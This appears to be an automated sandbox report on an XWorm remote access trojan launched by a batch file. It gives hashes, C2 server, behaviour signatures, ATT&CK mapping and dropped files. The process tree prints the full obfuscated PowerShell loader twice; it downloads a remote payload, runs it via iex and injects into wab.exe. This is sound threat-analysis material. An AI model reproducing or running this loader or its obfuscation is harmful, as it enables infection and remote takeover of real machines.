xworm | 74dded6a9d78cb7d3b4f1a0141abe5c25c552583a6a1a1a2c37d3e263f611ab6

General

Target

zap.cmd
Size

6KB
MD5

e60c8b85dbb0822e8d7783bfbcf1373e
SHA1

b82628d1e5f5990cce0fc1759db1d66d272970de
SHA256

74dded6a9d78cb7d3b4f1a0141abe5c25c552583a6a1a1a2c37d3e263f611ab6
SHA512

f4cd5242390b101450cd77d50c661332e042a5a49512d0421aa1aa245ed44820c4759f8db18b9643f4f29ae7ad853451b8b8bac9c76abaca85abbd4e64bd0229
SSDEEP

96:3CAmMQCWs85AG8Cdzn7mhmFDSKG1obatde4MlXMQpQAqvbfq0ifcZvc+dmu29g:3CANQC5iARCdQwg122NMzQq0iUNNdmuh

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1696-90-0x00000000007D0000-0x00000000007DE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 3032 powershell.exe
7 3032 powershell.exe
9 3032 powershell.exe
11 3032 powershell.exe
13 3032 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3032 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1696 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2844 powershell.exe
1696 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2844 set thread context of 1696 2844 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

3032 powershell.exe
2844 powershell.exe
2844 powershell.exe
1696 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2844 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 3032 powershell.exe
Token: SeDebugPrivilege 2844 powershell.exe
Token: SeDebugPrivilege 1696 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1696 wab.exe

flow	pid	process
5	3032	powershell.exe
7	3032	powershell.exe
9	3032	powershell.exe
11	3032	powershell.exe
13	3032	powershell.exe

pid	process
3032	powershell.exe

pid	process
1696	wab.exe

pid	process
2844	powershell.exe
1696	wab.exe

description	pid	process	target process
PID 2844 set thread context of 1696	2844	powershell.exe	wab.exe

pid	process
3032	powershell.exe
2844	powershell.exe
2844	powershell.exe
1696	wab.exe

pid	process
2844	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	1696	wab.exe

pid	process
1696	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2328 wrote to memory of 3032	2328	cmd.exe	powershell.exe
PID 2328 wrote to memory of 3032	2328	cmd.exe	powershell.exe
PID 2328 wrote to memory of 3032	2328	cmd.exe	powershell.exe
PID 3032 wrote to memory of 2528	3032	powershell.exe	cmd.exe
PID 3032 wrote to memory of 2528	3032	powershell.exe	cmd.exe
PID 3032 wrote to memory of 2528	3032	powershell.exe	cmd.exe
PID 3032 wrote to memory of 2844	3032	powershell.exe	powershell.exe
PID 3032 wrote to memory of 2844	3032	powershell.exe	powershell.exe
PID 3032 wrote to memory of 2844	3032	powershell.exe	powershell.exe
PID 3032 wrote to memory of 2844	3032	powershell.exe	powershell.exe
PID 2844 wrote to memory of 2896	2844	powershell.exe	cmd.exe
PID 2844 wrote to memory of 2896	2844	powershell.exe	cmd.exe
PID 2844 wrote to memory of 2896	2844	powershell.exe	cmd.exe
PID 2844 wrote to memory of 2896	2844	powershell.exe	cmd.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe
PID 2844 wrote to memory of 1696	2844	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"
3⤵
PID:2528

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"
4⤵
PID:2896

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1696

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
921d15efab12a8fa32ea2cddffa9c714

SHA1
dc5aca9d3f6228f750b4c76bc2787aeacdb161de

SHA256
5a98ac28eba65e047a8ff9dc8f5703cedf48a59e6377e6710148dc6a7e808967

SHA512
8f1d23dd4af65f3633d0744680ddde94001da94da10a70331535d4c666685a33f4ceb728021ce71aa1c2873ec929b3c0c02973b861f6786d0e83ec95f5ad9eb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar25A1.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Etherisers.Ops
Filesize
453KB

MD5
5ba170442dc9361bd82c89e62af29b80

SHA1
0b1fa0e1791eb03413106c875f0fb19113bc9ee1

SHA256
92c9377c83fcf01ad63607788e70752a121a0d9b3d394540b76f5fe304170674

SHA512
856a8d16441567d983eba5d9cd108289b6f656458df5bfb9dda8088a9b9a7ef25e7f7a5abb1b280c75609b275b4cc6d1f3483cabb3ddb7623478fdbeea8ddb50

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z93FOV9I2YQO1H3WALSI.temp
Filesize
7KB

MD5
61fb44844ac57ef270b5856b7417748e

SHA1
3ea18685037952143d1c634deb99548ddb703fe2

SHA256
09cb8f4687882ca1f28b43bf892ceb23d37078a2115221a93b29084b9b1cb090

SHA512
081d796cc363d8d05758e9fea22ee62bcd542ac4dd5c365b9dac126719b87df85e1d8ea830016c84006b168dda8cf5c64f0d30f6cde85f79784540cac8cd20ce

Download Submit
memory/1696-90-0x00000000007D0000-0x00000000007DE000-memory.dmp

Filesize
56KB

Download
memory/1696-88-0x00000000007D0000-0x0000000001832000-memory.dmp

Filesize
16.4MB

Download
memory/2844-59-0x0000000006880000-0x000000000B5B9000-memory.dmp

Filesize
77.2MB

Download
memory/3032-6-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-11-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-10-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-9-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-58-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-4-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

Filesize
4KB

Download
memory/3032-60-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

Filesize
4KB

Download
memory/3032-7-0x00000000028A0000-0x00000000028A8000-memory.dmp

Filesize
32KB

Download
memory/3032-8-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-89-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/3032-5-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing